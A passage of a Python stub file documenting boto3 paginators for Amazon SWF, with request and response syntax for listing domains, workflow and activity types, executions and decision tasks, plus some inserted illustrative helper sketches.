The ID of the ``LambdaFunctionScheduled`` event that was recorded when this Lambda task was scheduled. To help diagnose issues, use this information to trace back the chain of events leading up to this event.
- **cause** *(string) --*
The cause of the failure. To help diagnose issues, use this information to trace back the chain of events leading up to this event.
.. note::
If ``cause`` is set to ``OPERATION_NOT_PERMITTED`` , the decision failed because the IAM role attached to the execution lacked sufficient permissions. For details and example IAM policies, see `Lambda Tasks <http://docs.aws.amazon.com/amazonswf/latest/developerguide/lambda-task.html>`__ in the *Amazon SWF Developer Guide* .
- **message** *(string) --*
A description that can help diagnose the cause of the fault.
- **NextToken** *(string) --*
A token to resume pagination.
:type domain: string
:param domain: **[REQUIRED]**
The name of the domain containing the workflow execution.
:type execution: dict
:param execution: **[REQUIRED]**
Specifies the workflow execution for which to return the history.
- **workflowId** *(string) --* **[REQUIRED]**
The user-defined identifier associated with the workflow execution.
- **runId** *(string) --* **[REQUIRED]**
A system-generated unique identifier for the workflow execution.
:type reverseOrder: boolean
:param reverseOrder:
When set to ``true`` , returns the events in reverse order. By default the results are returned in ascending order of the ``eventTimestamp`` of the events.
:type PaginationConfig: dict
:param PaginationConfig:
A dictionary that provides parameters to control pagination.
- **MaxItems** *(integer) --*
The total number of items to return. If the total number of items available is more than the value specified in max-items then a ``NextToken`` will be provided in the output that you can use to resume pagination.
- **PageSize** *(integer) --*
The size of each page.
- **StartingToken** *(string) --*
A token to specify where to start paginating. This is the ``NextToken`` from a previous response.
:rtype: dict
:returns:
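As an illustration of the ``PaginationConfig`` semantics described above (``MaxItems``, ``PageSize``, and the ``StartingToken``/``NextToken`` handshake), here is a minimal local sketch. ``paginate_items`` is a hypothetical helper, not part of boto3, and the index-based token is a simplification of botocore's opaque continuation tokens.

```python
def paginate_items(items, max_items=None, page_size=10, starting_token=None):
    """Yield pages of `items`, loosely mimicking MaxItems/PageSize/
    StartingToken semantics; the token here is simply the next list index."""
    start = int(starting_token) if starting_token is not None else 0
    # MaxItems caps the total returned relative to the starting position.
    limit = len(items) if max_items is None else min(len(items), start + max_items)
    pos = start
    while pos < limit:
        page = items[pos:min(pos + page_size, limit)]
        pos += len(page)
        # A NextToken is emitted whenever items remain beyond what was returned.
        next_token = str(pos) if pos < len(items) else None
        yield {"events": page, "NextToken": next_token}

pages = list(paginate_items(list(range(7)), max_items=5, page_size=2))
```

Resuming with the final page's ``NextToken`` as ``starting_token`` picks up where the previous run stopped, which is exactly how ``StartingToken`` is meant to be used.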
"""
pass
class ListActivityTypes(Paginator):
def paginate(self, domain: str, registrationStatus: str, name: str = None, reverseOrder: bool = None, PaginationConfig: Dict = None) -> Dict:
"""
Creates an iterator that will paginate through responses from :py:meth:`SWF.Client.list_activity_types`.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/swf-2012-01-25/ListActivityTypes>`_
**Request Syntax**
::
response_iterator = paginator.paginate(
domain='string',
name='string',
registrationStatus='REGISTERED'|'DEPRECATED',
reverseOrder=True|False,
PaginationConfig={
'MaxItems': 123,
'PageSize': 123,
'StartingToken': 'string'
}
)
**Response Syntax**
::
{
'typeInfos': [
{
'activityType': {
'name': 'string',
'version': 'string'
},
'status': 'REGISTERED'|'DEPRECATED',
'description': 'string',
'creationDate': datetime(2015, 1, 1),
'deprecationDate': datetime(2015, 1, 1)
},
],
'NextToken': 'string'
}
**Response Structure**
- *(dict) --*
Contains a paginated list of activity type information structures.
- **typeInfos** *(list) --*
List of activity type information.
- *(dict) --*
Detailed information about an activity type.
- **activityType** *(dict) --*
The ActivityType type structure representing the activity type.
- **name** *(string) --*
The name of this activity.
.. note::
The combination of activity type name and version must be unique within a domain.
- **version** *(string) --*
The version of this activity.
.. note::
The combination of activity type name and version must be unique within a domain.
- **status** *(string) --*
The current status of the activity type.
- **description** *(string) --*
The description of the activity type provided in RegisterActivityType .
- **creationDate** *(datetime) --*
The date and time this activity type was created through RegisterActivityType .
- **deprecationDate** *(datetime) --*
If DEPRECATED, the date and time DeprecateActivityType was called.
- **NextToken** *(string) --*
A token to resume pagination.
:type domain: string
:param domain: **[REQUIRED]**
The name of the domain in which the activity types have been registered.
:type name: string
:param name:
If specified, only lists the activity types that have this name.
:type registrationStatus: string
:param registrationStatus: **[REQUIRED]**
Specifies the registration status of the activity types to list.
:type reverseOrder: boolean
:param reverseOrder:
When set to ``true`` , returns the results in reverse order. By default, the results are returned in ascending alphabetical order by ``name`` of the activity types.
:type PaginationConfig: dict
:param PaginationConfig:
A dictionary that provides parameters to control pagination.
- **MaxItems** *(integer) --*
The total number of items to return. If the total number of items available is more than the value specified in max-items then a ``NextToken`` will be provided in the output that you can use to resume pagination.
- **PageSize** *(integer) --*
The size of each page.
- **StartingToken** *(string) --*
A token to specify where to start paginating. This is the ``NextToken`` from a previous response.
:rtype: dict
:returns:
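To show how the paginated ``typeInfos`` structure above is typically consumed, the sketch below flattens hypothetical pages (shaped like the response syntax) into a list of registered activity types. The sample data and ``registered_types`` helper are illustrative only.

```python
# Two hypothetical pages shaped like the ListActivityTypes response syntax.
pages = [
    {"typeInfos": [{"activityType": {"name": "resize", "version": "1"},
                    "status": "REGISTERED"}],
     "NextToken": "tok-1"},
    {"typeInfos": [{"activityType": {"name": "resize", "version": "2"},
                    "status": "DEPRECATED"}]},
]

def registered_types(pages):
    """Flatten paginated typeInfos, keeping only REGISTERED activity types."""
    return [(info["activityType"]["name"], info["activityType"]["version"])
            for page in pages
            for info in page["typeInfos"]
            if info["status"] == "REGISTERED"]
```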
"""
pass
class ListClosedWorkflowExecutions(Paginator):
def paginate(self, domain: str, startTimeFilter: Dict = None, closeTimeFilter: Dict = None, executionFilter: Dict = None, closeStatusFilter: Dict = None, typeFilter: Dict = None, tagFilter: Dict = None, reverseOrder: bool = None, PaginationConfig: Dict = None) -> Dict:
"""
Creates an iterator that will paginate through responses from :py:meth:`SWF.Client.list_closed_workflow_executions`.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/swf-2012-01-25/ListClosedWorkflowExecutions>`_
**Request Syntax**
::
response_iterator = paginator.paginate(
domain='string',
startTimeFilter={
'oldestDate': datetime(2015, 1, 1),
'latestDate': datetime(2015, 1, 1)
},
closeTimeFilter={
'oldestDate': datetime(2015, 1, 1),
'latestDate': datetime(2015, 1, 1)
},
executionFilter={
'workflowId': 'string'
},
closeStatusFilter={
'status': 'COMPLETED'|'FAILED'|'CANCELED'|'TERMINATED'|'CONTINUED_AS_NEW'|'TIMED_OUT'
},
typeFilter={
'name': 'string',
'version': 'string'
},
tagFilter={
'tag': 'string'
},
reverseOrder=True|False,
PaginationConfig={
'MaxItems': 123,
'PageSize': 123,
'StartingToken': 'string'
}
)
**Response Syntax**
::
{
'executionInfos': [
{
'execution': {
'workflowId': 'string',
'runId': 'string'
},
'workflowType': {
'name': 'string',
'version': 'string'
},
'startTimestamp': datetime(2015, 1, 1),
'closeTimestamp': datetime(2015, 1, 1),
'executionStatus': 'OPEN'|'CLOSED',
'closeStatus': 'COMPLETED'|'FAILED'|'CANCELED'|'TERMINATED'|'CONTINUED_AS_NEW'|'TIMED_OUT',
'parent': {
'workflowId': 'string',
'runId': 'string'
},
'tagList': [
'string',
],
'cancelRequested': True|False
},
],
'NextToken': 'string'
}
**Response Structure**
- *(dict) --*
Contains a paginated list of information about workflow executions.
- **executionInfos** *(list) --*
The list of workflow information structures.
- *(dict) --*
Contains information about a workflow execution.
- **execution** *(dict) --*
The workflow execution this information is about.
- **workflowId** *(string) --*
The user-defined identifier associated with the workflow execution.
- **runId** *(string) --*
A system-generated unique identifier for the workflow execution.
- **workflowType** *(dict) --*
The type of the workflow execution.
- **name** *(string) --*
The name of the workflow type.
.. note::
The combination of workflow type name and version must be unique within a domain.
- **version** *(string) --*
The version of the workflow type.
.. note::
The combination of workflow type name and version must be unique within a domain.
- **startTimestamp** *(datetime) --*
The time when the execution was started.
- **closeTimestamp** *(datetime) --*
The time when the workflow execution was closed. Set only if the execution status is CLOSED.
- **executionStatus** *(string) --*
The current status of the execution.
- **closeStatus** *(string) --*
If the execution status is closed then this specifies how the execution was closed:
* ``COMPLETED`` – the execution was successfully completed.
* ``CANCELED`` – the execution was canceled. Cancellation allows the implementation to gracefully clean up before the execution is closed.
* ``TERMINATED`` – the execution was force terminated.
* ``FAILED`` – the execution failed to complete.
* ``TIMED_OUT`` – the execution did not complete in the allotted time and was automatically timed out.
* ``CONTINUED_AS_NEW`` – the execution is logically continued. This means the current execution was completed and a new execution was started to carry on the workflow.
- **parent** *(dict) --*
If this workflow execution is a child of another execution then contains the workflow execution that started this execution.
- **workflowId** *(string) --*
The user-defined identifier associated with the workflow execution.
- **runId** *(string) --*
A system-generated unique identifier for the workflow execution.
- **tagList** *(list) --*
The list of tags associated with the workflow execution. Tags can be used to identify and list workflow executions of interest through the visibility APIs. A workflow execution can have a maximum of 5 tags.
- *(string) --*
- **cancelRequested** *(boolean) --*
Set to true if a cancellation is requested for this workflow execution.
- **NextToken** *(string) --*
A token to resume pagination.
:type domain: string
:param domain: **[REQUIRED]**
The name of the domain that contains the workflow executions to list.
:type startTimeFilter: dict
:param startTimeFilter:
If specified, the workflow executions are included in the returned results based on whether their start times are within the range specified by this filter. Also, if this parameter is specified, the returned results are ordered by their start times.
.. note::
``startTimeFilter`` and ``closeTimeFilter`` are mutually exclusive. You must specify one of these in a request but not both.
- **oldestDate** *(datetime) --* **[REQUIRED]**
Specifies the oldest start or close date and time to return.
- **latestDate** *(datetime) --*
Specifies the latest start or close date and time to return.
:type closeTimeFilter: dict
:param closeTimeFilter:
If specified, the workflow executions are included in the returned results based on whether their close times are within the range specified by this filter. Also, if this parameter is specified, the returned results are ordered by their close times.
.. note::
``startTimeFilter`` and ``closeTimeFilter`` are mutually exclusive. You must specify one of these in a request but not both.
- **oldestDate** *(datetime) --* **[REQUIRED]**
Specifies the oldest start or close date and time to return.
- **latestDate** *(datetime) --*
Specifies the latest start or close date and time to return.
:type executionFilter: dict
:param executionFilter:
If specified, only workflow executions matching the workflow ID specified in the filter are returned.
.. note::
``closeStatusFilter`` , ``executionFilter`` , ``typeFilter`` and ``tagFilter`` are mutually exclusive. You can specify at most one of these in a request.
- **workflowId** *(string) --* **[REQUIRED]**
The workflowId to match against the criteria of this filter.
:type closeStatusFilter: dict
:param closeStatusFilter:
If specified, only workflow executions that match this *close status* are listed. For example, if TERMINATED is specified, then only TERMINATED workflow executions are listed.
.. note::
``closeStatusFilter`` , ``executionFilter`` , ``typeFilter`` and ``tagFilter`` are mutually exclusive. You can specify at most one of these in a request.
- **status** *(string) --* **[REQUIRED]**
The close status that must match the close status of an execution for it to meet the criteria of this filter.
:type typeFilter: dict
:param typeFilter:
If specified, only executions of the type specified in the filter are returned.
.. note::
``closeStatusFilter`` , ``executionFilter`` , ``typeFilter`` and ``tagFilter`` are mutually exclusive. You can specify at most one of these in a request.
- **name** *(string) --* **[REQUIRED]**
Name of the workflow type.
- **version** *(string) --*
Version of the workflow type.
:type tagFilter: dict
:param tagFilter:
If specified, only executions that have the matching tag are listed.
.. note::
``closeStatusFilter`` , ``executionFilter`` , ``typeFilter`` and ``tagFilter`` are mutually exclusive. You can specify at most one of these in a request.
- **tag** *(string) --* **[REQUIRED]**
Specifies the tag that must be associated with the execution for it to meet the filter criteria.
:type reverseOrder: boolean
:param reverseOrder:
When set to ``true`` , returns the results in reverse order. By default the results are returned in descending order of the start or the close time of the executions.
:type PaginationConfig: dict
:param PaginationConfig:
A dictionary that provides parameters to control pagination.
- **MaxItems** *(integer) --*
The total number of items to return. If the total number of items available is more than the value specified in max-items then a ``NextToken`` will be provided in the output that you can use to resume pagination.
- **PageSize** *(integer) --*
The size of each page.
- **StartingToken** *(string) --*
A token to specify where to start paginating. This is the ``NextToken`` from a previous response.
:rtype: dict
:returns:
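The notes above state two mutual-exclusion rules: exactly one of ``startTimeFilter``/``closeTimeFilter`` must be given, and at most one of ``closeStatusFilter``, ``executionFilter``, ``typeFilter``, ``tagFilter``. A client-side pre-flight check (illustrative; the service performs its own validation, and ``validate_list_closed_kwargs`` is a hypothetical helper) might look like:

```python
def validate_list_closed_kwargs(kwargs):
    """Check the documented mutual-exclusion rules for
    list_closed_workflow_executions before calling the API."""
    time_filters = [k for k in ("startTimeFilter", "closeTimeFilter") if k in kwargs]
    if len(time_filters) != 1:
        raise ValueError("specify exactly one of startTimeFilter, closeTimeFilter")
    selectors = [k for k in ("closeStatusFilter", "executionFilter",
                             "typeFilter", "tagFilter") if k in kwargs]
    if len(selectors) > 1:
        raise ValueError("closeStatusFilter, executionFilter, typeFilter and "
                         "tagFilter are mutually exclusive; specify at most one")
```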
"""
pass
class ListDomains(Paginator):
def paginate(self, registrationStatus: str, reverseOrder: bool = None, PaginationConfig: Dict = None) -> Dict:
"""
Creates an iterator that will paginate through responses from :py:meth:`SWF.Client.list_domains`.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/swf-2012-01-25/ListDomains>`_
**Request Syntax**
::
response_iterator = paginator.paginate(
registrationStatus='REGISTERED'|'DEPRECATED',
reverseOrder=True|False,
PaginationConfig={
'MaxItems': 123,
'PageSize': 123,
'StartingToken': 'string'
}
)
**Response Syntax**
::
{
'domainInfos': [
{
'name': 'string',
'status': 'REGISTERED'|'DEPRECATED',
'description': 'string'
},
],
'NextToken': 'string'
}
**Response Structure**
- *(dict) --*
Contains a paginated collection of DomainInfo structures.
- **domainInfos** *(list) --*
A list of DomainInfo structures.
- *(dict) --*
Contains general information about a domain.
- **name** *(string) --*
The name of the domain. This name is unique within the account.
- **status** *(string) --*
The status of the domain:
* ``REGISTERED`` – The domain is properly registered and available. You can use this domain for registering types and creating new workflow executions.
* ``DEPRECATED`` – The domain was deprecated using DeprecateDomain , but is still in use. You should not create new workflow executions in this domain.
- **description** *(string) --*
The description of the domain provided through RegisterDomain .
- **NextToken** *(string) --*
A token to resume pagination.
:type registrationStatus: string
:param registrationStatus: **[REQUIRED]**
Specifies the registration status of the domains to list.
:type reverseOrder: boolean
:param reverseOrder:
When set to ``true`` , returns the results in reverse order. By default, the results are returned in ascending alphabetical order by ``name`` of the domains.
:type PaginationConfig: dict
:param PaginationConfig:
A dictionary that provides parameters to control pagination.
- **MaxItems** *(integer) --*
The total number of items to return. If the total number of items available is more than the value specified in max-items then a ``NextToken`` will be provided in the output that you can use to resume pagination.
- **PageSize** *(integer) --*
The size of each page.
- **StartingToken** *(string) --*
A token to specify where to start paginating. This is the ``NextToken`` from a previous response.
:rtype: dict
:returns:
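A common way to consume the paginated ``domainInfos`` shown above is to merge the pages into a single name-to-status mapping. The sample pages and ``domain_statuses`` helper below are hypothetical, shaped after the response syntax.

```python
# Hypothetical pages shaped like the ListDomains response syntax above.
pages = [
    {"domainInfos": [{"name": "prod", "status": "REGISTERED", "description": ""}],
     "NextToken": "tok"},
    {"domainInfos": [{"name": "legacy", "status": "DEPRECATED", "description": ""}]},
]

def domain_statuses(pages):
    """Merge the paginated domainInfos into one name -> status mapping."""
    return {info["name"]: info["status"]
            for page in pages for info in page["domainInfos"]}
```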
"""
pass
class ListOpenWorkflowExecutions(Paginator):
def paginate(self, domain: str, startTimeFilter: Dict, typeFilter: Dict = None, tagFilter: Dict = None, reverseOrder: bool = None, executionFilter: Dict = None, PaginationConfig: Dict = None) -> Dict:
"""
Creates an iterator that will paginate through responses from :py:meth:`SWF.Client.list_open_workflow_executions`.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/swf-2012-01-25/ListOpenWorkflowExecutions>`_
**Request Syntax**
::
response_iterator = paginator.paginate(
domain='string',
startTimeFilter={
'oldestDate': datetime(2015, 1, 1),
'latestDate': datetime(2015, 1, 1)
},
typeFilter={
'name': 'string',
'version': 'string'
},
tagFilter={
'tag': 'string'
},
reverseOrder=True|False,
executionFilter={
'workflowId': 'string'
},
PaginationConfig={
'MaxItems': 123,
'PageSize': 123,
'StartingToken': 'string'
}
)
**Response Syntax**
::
{
'executionInfos': [
{
'execution': {
'workflowId': 'string',
'runId': 'string'
},
'workflowType': {
'name': 'string',
'version': 'string'
},
'startTimestamp': datetime(2015, 1, 1),
'closeTimestamp': datetime(2015, 1, 1),
'executionStatus': 'OPEN'|'CLOSED',
'closeStatus': 'COMPLETED'|'FAILED'|'CANCELED'|'TERMINATED'|'CONTINUED_AS_NEW'|'TIMED_OUT',
'parent': {
'workflowId': 'string',
'runId': 'string'
},
'tagList': [
'string',
],
'cancelRequested': True|False
},
],
'NextToken': 'string'
}
**Response Structure**
- *(dict) --*
Contains a paginated list of information about workflow executions.
- **executionInfos** *(list) --*
The list of workflow information structures.
- *(dict) --*
Contains information about a workflow execution.
- **execution** *(dict) --*
The workflow execution this information is about.
- **workflowId** *(string) --*
The user-defined identifier associated with the workflow execution.
- **runId** *(string) --*
A system-generated unique identifier for the workflow execution.
- **workflowType** *(dict) --*
The type of the workflow execution.
- **name** *(string) --*
The name of the workflow type.
.. note::
The combination of workflow type name and version must be unique within a domain.
- **version** *(string) --*
The version of the workflow type.
.. note::
The combination of workflow type name and version must be unique within a domain.
- **startTimestamp** *(datetime) --*
The time when the execution was started.
- **closeTimestamp** *(datetime) --*
The time when the workflow execution was closed. Set only if the execution status is CLOSED.
- **executionStatus** *(string) --*
The current status of the execution.
- **closeStatus** *(string) --*
If the execution status is closed then this specifies how the execution was closed:
* ``COMPLETED`` – the execution was successfully completed.
* ``CANCELED`` – the execution was canceled. Cancellation allows the implementation to gracefully clean up before the execution is closed.
* ``TERMINATED`` – the execution was force terminated.
* ``FAILED`` – the execution failed to complete.
* ``TIMED_OUT`` – the execution did not complete in the allotted time and was automatically timed out.
* ``CONTINUED_AS_NEW`` – the execution is logically continued. This means the current execution was completed and a new execution was started to carry on the workflow.
- **parent** *(dict) --*
If this workflow execution is a child of another execution then contains the workflow execution that started this execution.
- **workflowId** *(string) --*
The user-defined identifier associated with the workflow execution.
- **runId** *(string) --*
A system-generated unique identifier for the workflow execution.
- **tagList** *(list) --*
The list of tags associated with the workflow execution. Tags can be used to identify and list workflow executions of interest through the visibility APIs. A workflow execution can have a maximum of 5 tags.
- *(string) --*
- **cancelRequested** *(boolean) --*
Set to true if a cancellation is requested for this workflow execution.
- **NextToken** *(string) --*
A token to resume pagination.
:type domain: string
:param domain: **[REQUIRED]**
The name of the domain that contains the workflow executions to list.
:type startTimeFilter: dict
:param startTimeFilter: **[REQUIRED]**
Workflow executions are included in the returned results based on whether their start times are within the range specified by this filter.
- **oldestDate** *(datetime) --* **[REQUIRED]**
Specifies the oldest start or close date and time to return.
- **latestDate** *(datetime) --*
Specifies the latest start or close date and time to return.
:type typeFilter: dict
:param typeFilter:
If specified, only executions of the type specified in the filter are returned.
.. note::
``executionFilter`` , ``typeFilter`` and ``tagFilter`` are mutually exclusive. You can specify at most one of these in a request.
- **name** *(string) --* **[REQUIRED]**
Name of the workflow type.
- **version** *(string) --*
Version of the workflow type.
:type tagFilter: dict
:param tagFilter:
If specified, only executions that have the matching tag are listed.
.. note::
``executionFilter`` , ``typeFilter`` and ``tagFilter`` are mutually exclusive. You can specify at most one of these in a request.
- **tag** *(string) --* **[REQUIRED]**
Specifies the tag that must be associated with the execution for it to meet the filter criteria.
:type reverseOrder: boolean
:param reverseOrder:
When set to ``true`` , returns the results in reverse order. By default the results are returned in descending order of the start time of the executions.
:type executionFilter: dict
:param executionFilter:
If specified, only workflow executions matching the workflow ID specified in the filter are returned.
.. note::
``executionFilter`` , ``typeFilter`` and ``tagFilter`` are mutually exclusive. You can specify at most one of these in a request.
- **workflowId** *(string) --* **[REQUIRED]**
The workflowId to match against the criteria of this filter.
:type PaginationConfig: dict
:param PaginationConfig:
A dictionary that provides parameters to control pagination.
- **MaxItems** *(integer) --*
The total number of items to return. If the total number of items available is more than the value specified in max-items then a ``NextToken`` will be provided in the output that you can use to resume pagination.
- **PageSize** *(integer) --*
The size of each page.
- **StartingToken** *(string) --*
A token to specify where to start paginating. This is the ``NextToken`` from a previous response.
:rtype: dict
:returns:
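The ``typeFilter``, ``tagFilter`` and ``executionFilter`` parameters above select executions server-side and are mutually exclusive. For illustration only, the hypothetical ``matches`` function below mirrors that selection logic against an ``executionInfo`` dict shaped like the response syntax.

```python
def matches(info, typeFilter=None, tagFilter=None, executionFilter=None):
    """Return True if an executionInfo (shaped like the response above)
    satisfies the single filter given; a local mirror of the documented
    server-side filters, for illustration only."""
    given = [f for f in (typeFilter, tagFilter, executionFilter) if f is not None]
    if len(given) > 1:
        raise ValueError("typeFilter, tagFilter and executionFilter "
                         "are mutually exclusive")
    if typeFilter is not None:
        wt = info["workflowType"]
        if wt["name"] != typeFilter["name"]:
            return False
        # version is optional in the filter; omit it to match any version.
        return "version" not in typeFilter or wt["version"] == typeFilter["version"]
    if tagFilter is not None:
        return tagFilter["tag"] in info.get("tagList", [])
    if executionFilter is not None:
        return info["execution"]["workflowId"] == executionFilter["workflowId"]
    return True
```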
"""
pass
class ListWorkflowTypes(Paginator):
def paginate(self, domain: str, registrationStatus: str, name: str = None, reverseOrder: bool = None, PaginationConfig: Dict = None) -> Dict:
"""
Creates an iterator that will paginate through responses from :py:meth:`SWF.Client.list_workflow_types`.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/swf-2012-01-25/ListWorkflowTypes>`_
**Request Syntax**
::
response_iterator = paginator.paginate(
domain='string',
name='string',
registrationStatus='REGISTERED'|'DEPRECATED',
reverseOrder=True|False,
PaginationConfig={
'MaxItems': 123,
'PageSize': 123,
'StartingToken': 'string'
}
)
**Response Syntax**
::
{
'typeInfos': [
{
'workflowType': {
'name': 'string',
'version': 'string'
},
'status': 'REGISTERED'|'DEPRECATED',
'description': 'string',
'creationDate': datetime(2015, 1, 1),
'deprecationDate': datetime(2015, 1, 1)
},
],
'NextToken': 'string'
}
**Response Structure**
- *(dict) --*
Contains a paginated list of information structures about workflow types.
- **typeInfos** *(list) --*
The list of workflow type information.
- *(dict) --*
Contains information about a workflow type.
- **workflowType** *(dict) --*
The workflow type this information is about.
- **name** *(string) --*
The name of the workflow type.
.. note::
The combination of workflow type name and version must be unique within a domain.
- **version** *(string) --*
The version of the workflow type.
.. note::
The combination of workflow type name and version must be unique within a domain.
- **status** *(string) --*
The current status of the workflow type.
- **description** *(string) --*
The description of the type registered through RegisterWorkflowType .
- **creationDate** *(datetime) --*
The date when this type was registered.
- **deprecationDate** *(datetime) --*
If the type is in a deprecated state, this is set to the date when the type was deprecated.
- **NextToken** *(string) --*
A token to resume pagination.
:type domain: string
:param domain: **[REQUIRED]**
The name of the domain in which the workflow types have been registered.
:type name: string
:param name:
If specified, lists the workflow type with this name.
:type registrationStatus: string
:param registrationStatus: **[REQUIRED]**
Specifies the registration status of the workflow types to list.
:type reverseOrder: boolean
:param reverseOrder:
When set to ``true`` , returns the results in reverse order. By default the results are returned in ascending alphabetical order of the ``name`` of the workflow types.
:type PaginationConfig: dict
:param PaginationConfig:
A dictionary that provides parameters to control pagination.
- **MaxItems** *(integer) --*
The total number of items to return. If the total number of items available is more than the value specified in max-items then a ``NextToken`` will be provided in the output that you can use to resume pagination.
- **PageSize** *(integer) --*
The size of each page.
- **StartingToken** *(string) --*
A token to specify where to start paginating. This is the ``NextToken`` from a previous response.
:rtype: dict
:returns:
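The notes above guarantee that the combination of workflow type name and version is unique within a domain. The hypothetical ``duplicate_workflow_types`` helper below makes that invariant concrete by detecting any repeated (name, version) pairs in a flattened ``typeInfos`` list; within a single domain it should always return an empty list.

```python
def duplicate_workflow_types(type_infos):
    """Return sorted (name, version) pairs that appear more than once in a
    flattened typeInfos list; empty within one domain, per the notes above."""
    seen, dupes = set(), set()
    for info in type_infos:
        key = (info["workflowType"]["name"], info["workflowType"]["version"])
        if key in seen:
            dupes.add(key)
        seen.add(key)
    return sorted(dupes)
```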
"""
pass
class PollForDecisionTask(Paginator):
def paginate(self, domain: str, taskList: Dict, identity: str = None, reverseOrder: bool = None, PaginationConfig: Dict = None) -> Dict:
"""
Creates an iterator that will paginate through responses from :py:meth:`SWF.Client.poll_for_decision_task`.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/swf-2012-01-25/PollForDecisionTask>`_
**Request Syntax**
::
response_iterator = paginator.paginate(
domain='string',
taskList={
'name': 'string'
},
identity='string',
reverseOrder=True|False,
PaginationConfig={
'MaxItems': 123,
'PageSize': 123,
'StartingToken': 'string'
}
)
**Response Syntax**
::
{
'taskToken': 'string',
'startedEventId': 123,
'workflowExecution': {
'workflowId': 'string',
'runId': 'string'
},
'workflowType': {
'name': 'string',
'version': 'string'
},
'events': [
{
'eventTimestamp': datetime(2015, 1, 1),
'eventType': 'WorkflowExecutionStarted'|'WorkflowExecutionCancelRequested'|'WorkflowExecutionCompleted'|'CompleteWorkflowExecutionFailed'|'WorkflowExecutionFailed'|'FailWorkflowExecutionFailed'|'WorkflowExecutionTimedOut'|'WorkflowExecutionCanceled'|'CancelWorkflowExecutionFailed'|'WorkflowExecutionContinuedAsNew'|'ContinueAsNewWorkflowExecutionFailed'|'WorkflowExecutionTerminated'|'DecisionTaskScheduled'|'DecisionTaskStarted'|'DecisionTaskCompleted'|'DecisionTaskTimedOut'|'ActivityTaskScheduled'|'ScheduleActivityTaskFailed'|'ActivityTaskStarted'|'ActivityTaskCompleted'|'ActivityTaskFailed'|'ActivityTaskTimedOut'|'ActivityTaskCanceled'|'ActivityTaskCancelRequested'|'RequestCancelActivityTaskFailed'|'WorkflowExecutionSignaled'|'MarkerRecorded'|'RecordMarkerFailed'|'TimerStarted'|'StartTimerFailed'|'TimerFired'|'TimerCanceled'|'CancelTimerFailed'|'StartChildWorkflowExecutionInitiated'|'StartChildWorkflowExecutionFailed'|'ChildWorkflowExecutionStarted'|'ChildWorkflowExecutionCompleted'|'ChildWorkflowExecutionFailed'|'ChildWorkflowExecutionTimedOut'|'ChildWorkflowExecutionCanceled'|'ChildWorkflowExecutionTerminated'|'SignalExternalWorkflowExecutionInitiated'|'SignalExternalWorkflowExecutionFailed'|'ExternalWorkflowExecutionSignaled'|'RequestCancelExternalWorkflowExecutionInitiated'|'RequestCancelExternalWorkflowExecutionFailed'|'ExternalWorkflowExecutionCancelRequested'|'LambdaFunctionScheduled'|'LambdaFunctionStarted'|'LambdaFunctionCompleted'|'LambdaFunctionFailed'|'LambdaFunctionTimedOut'|'ScheduleLambdaFunctionFailed'|'StartLambdaFunctionFailed',
'eventId': 123,
'workflowExecutionStartedEventAttributes': {
'input': 'string',
'executionStartToCloseTimeout': 'string',
'taskStartToCloseTimeout': 'string',
'childPolicy': 'TERMINATE'|'REQUEST_CANCEL'|'ABANDON',
'taskList': {
'name': 'string'
},
'taskPriority': 'string',
'workflowType': {
'name': 'string',
'version': 'string'
},
'tagList': [
'string',
],
'continuedExecutionRunId': 'string',
'parentWorkflowExecution': {
'workflowId': 'string',
'runId': 'string'
},
'parentInitiatedEventId': 123,
'lambdaRole': 'string'
},
'workflowExecutionCompletedEventAttributes': {
'result': 'string',
'decisionTaskCompletedEventId': 123
},
'completeWorkflowExecutionFailedEventAttributes': {
'cause': 'UNHANDLED_DECISION'|'OPERATION_NOT_PERMITTED',
'decisionTaskCompletedEventId': 123
},
'workflowExecutionFailedEventAttributes': {
'reason': 'string',
'details': 'string',
'decisionTaskCompletedEventId': 123
},
'failWorkflowExecutionFailedEventAttributes': {
'cause': 'UNHANDLED_DECISION'|'OPERATION_NOT_PERMITTED',
'decisionTaskCompletedEventId': 123
},
'workflowExecutionTimedOutEventAttributes': {
'timeoutType': 'START_TO_CLOSE',
'childPolicy': 'TERMINATE'|'REQUEST_CANCEL'|'ABANDON'
},
'workflowExecutionCanceledEventAttributes': {
'details': 'string',
'decisionTaskCompletedEventId': 123
},
'cancelWorkflowExecutionFailedEventAttributes': {
'cause': 'UNHANDLED_DECISION'|'OPERATION_NOT_PERMITTED',
'decisionTaskCompletedEventId': 123
},
'workflowExecutionContinuedAsNewEventAttributes': {
'input': 'string',
'decisionTaskCompletedEventId': 123,
'newExecutionRunId': 'string',
'executionStartToCloseTimeout': 'string',
'taskList': {
'name': 'string'
},
'taskPriority': 'string',
'taskStartToCloseTimeout': 'string',
'childPolicy': 'TERMINATE'|'REQUEST_CANCEL'|'ABANDON',
'tagList': [
'string',
],
'workflowType': {
'name': 'string',
'version': 'string'
},
'lambdaRole': 'string'
},
'continueAsNewWorkflowExecutionFailedEventAttributes': {
'cause': 'UNHANDLED_DECISION'|'WORKFLOW_TYPE_DEPRECATED'|'WORKFLOW_TYPE_DOES_NOT_EXIST'|'DEFAULT_EXECUTION_START_TO_CLOSE_TIMEOUT_UNDEFINED'|'DEFAULT_TASK_START_TO_CLOSE_TIMEOUT_UNDEFINED'|'DEFAULT_TASK_LIST_UNDEFINED'|'DEFAULT_CHILD_POLICY_UNDEFINED'|'CONTINUE_AS_NEW_WORKFLOW_EXECUTION_RATE_EXCEEDED'|'OPERATION_NOT_PERMITTED',
'decisionTaskCompletedEventId': 123
},
'workflowExecutionTerminatedEventAttributes': {
'reason': 'string',
'details': 'string',
'childPolicy': 'TERMINATE'|'REQUEST_CANCEL'|'ABANDON',
'cause': 'CHILD_POLICY_APPLIED'|'EVENT_LIMIT_EXCEEDED'|'OPERATOR_INITIATED'
},
'workflowExecutionCancelRequestedEventAttributes': {
'externalWorkflowExecution': {
'workflowId': 'string',
'runId': 'string'
},
'externalInitiatedEventId': 123,
'cause': 'CHILD_POLICY_APPLIED'
},
'decisionTaskScheduledEventAttributes': {
'taskList': {
'name': 'string'
},
'taskPriority': 'string',
'startToCloseTimeout': 'string'
},
'decisionTaskStartedEventAttributes': {
'identity': 'string',
'scheduledEventId': 123
},
'decisionTaskCompletedEventAttributes': {
'executionContext': 'string',
'scheduledEventId': 123,
